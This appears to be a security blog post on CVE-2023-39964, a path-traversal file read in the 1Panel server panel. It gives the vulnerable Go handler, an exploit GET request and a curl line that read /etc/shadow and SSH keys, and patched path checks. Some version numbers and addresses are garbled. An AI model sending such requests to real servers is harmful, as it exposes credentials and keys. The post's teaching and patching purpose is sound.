CVE-2023-39964 describes a chilling vulnerability in 1Panel—a popular open source Linux server management panel. Anyone managing servers might use 1Panel for easy web-based administration, so a bug here is serious business. In 1Panel’s version 1.4.3 and below, a poorly validated file path lets attackers read *any* file their heart desires, from /etc/passwd to sensitive system configs. The bug is patched as of version 1.5., but let’s take a look at how things went wrong, including code snippets and an easy-to-follow exploit.

What Is 1Panel?

1Panel is a graphical admin panel for Linux. It lets you manage users, monitor systems, set up websites, and handle files through a friendly web interface. Like many tools, it’s written in Go for speed, and since it needs access to administer the server, any flaws here unlock a lot for hackers.

Technical Roots

The culprit sits inside api/v1/file.go in the LoadFromFile function. Here’s what happens in the code (code simplified for clarity):

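// api/v1/file.go (version 1.4.3)
func LoadFromFile(c *gin.Context) {
    // "path" comes straight from the query string and is never validated.
    path := c.Query("path")
    // Reads whatever file the 1Panel process has permission to open.
    data, err := ioutil.ReadFile(path)
    if err != nil {
        c.JSON(400, gin.H{"error": err.Error()})
        return
    }
    c.String(200, string(data))
}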

Notice the problem? The path parameter is taken straight from the web request—with no checks. This means you can ask 1Panel to read *any* file the Linux user running 1Panel can access.

Exploit Scenario

With access to the 1Panel web interface (often at 127...1:808 or published publicly), a simple HTTP GET like this is enough:

GET /api/v1/file/load?path=/etc/passwd HTTP/1.1
Host: vulnerable-server.com
Authorization: Bearer <your_token_if_needed>

Or, with curl:

curl "http://vulnerable-server.com/api/v1/file/load?path=/etc/shadow";

If authentication is weak (or bypassable), the attacker gets the response—the full contents of /etc/shadow, /root/.ssh/id_rsa, config files with secrets, and more.

The Patch (1.5. and Above)

After CVE-2023-39964 was reported, the 1Panel team fixed the bug. The patched code now restricts file reads to certain directories or checks the path against a whitelist.

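Example of a safe approach:

// Reject any request whose cleaned path falls outside baseDir.
baseDir := "/home/1panel/files/"
cleaned := filepath.Clean(path) // lexical only: collapses "." and "..", does not resolve symlinks
if !strings.HasPrefix(cleaned, baseDir) {
    c.JSON(403, gin.H{"error": "Access Denied"})
    return
}
// Use cleaned, not the raw path, for the read that follows.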
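
The prefix check above is purely lexical: filepath.Clean does not follow symlinks, so a link inside the base directory that points elsewhere still passes it. The following is an added example, not 1Panel's actual patch and not code from the original article; it resolves symlinks before testing containment, and resolveWithin, makeFixture and the temp-directory layout are hypothetical names and constructed sample data.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// resolveWithin (hypothetical helper): real path of p, or an error if p leaves baseDir.
func resolveWithin(baseDir, p string) (string, error) {
	base, err := filepath.EvalSymlinks(baseDir) // the base itself may sit behind a symlink
	if err != nil {
		return "", err
	}
	resolved, err := filepath.EvalSymlinks(p) // follows every link; fails if p does not exist
	if err != nil {
		return "", err
	}
	rel, err := filepath.Rel(base, resolved)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%q resolves outside %q", p, baseDir)
	}
	return resolved, nil
}

// makeFixture builds constructed sample data: files/ok.txt, secret.txt, files/link -> ../secret.txt.
func makeFixture() (string, error) {
	tmp, err := os.MkdirTemp("", "pathcheck")
	if err != nil {
		return "", err
	}
	base := filepath.Join(tmp, "files") + "/"
	os.Mkdir(base, 0o700)
	os.WriteFile(base+"ok.txt", []byte("ok"), 0o600)
	os.WriteFile(filepath.Join(tmp, "secret.txt"), []byte("s3cr3t"), 0o600)
	return base, os.Symlink("../secret.txt", base+"link")
}

func main() {
	base, err := makeFixture()
	if err != nil {
		panic(err)
	}
	for _, p := range []string{"ok.txt", "link", "../secret.txt"} {
		lexical := strings.HasPrefix(filepath.Clean(base+p), base) // prefix test from the article
		_, err := resolveWithin(base, base+p)
		fmt.Printf("%-14s lexical_ok=%v resolved_err=%v\n", p, lexical, err)
	}
}
```

Open the path that resolveWithin returns rather than the caller-supplied one; this narrows but does not remove the window between the check and the read.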

The Takeaway

If you run 1Panel, *update to 1.5. or newer immediately*—don’t assume internal panels are safe by default. Review your configs and logs for signs of suspicious file requests, and remember: always validate and sanitize file paths supplied by users, especially in tools that control your server.

Stay Safe. Patch Often!

*Written exclusively for educational awareness by an independent security writer.*

Timeline

Published on: 08/10/2023 18:15:00 UTC
Last modified on: 09/08/2023 16:56:00 UTC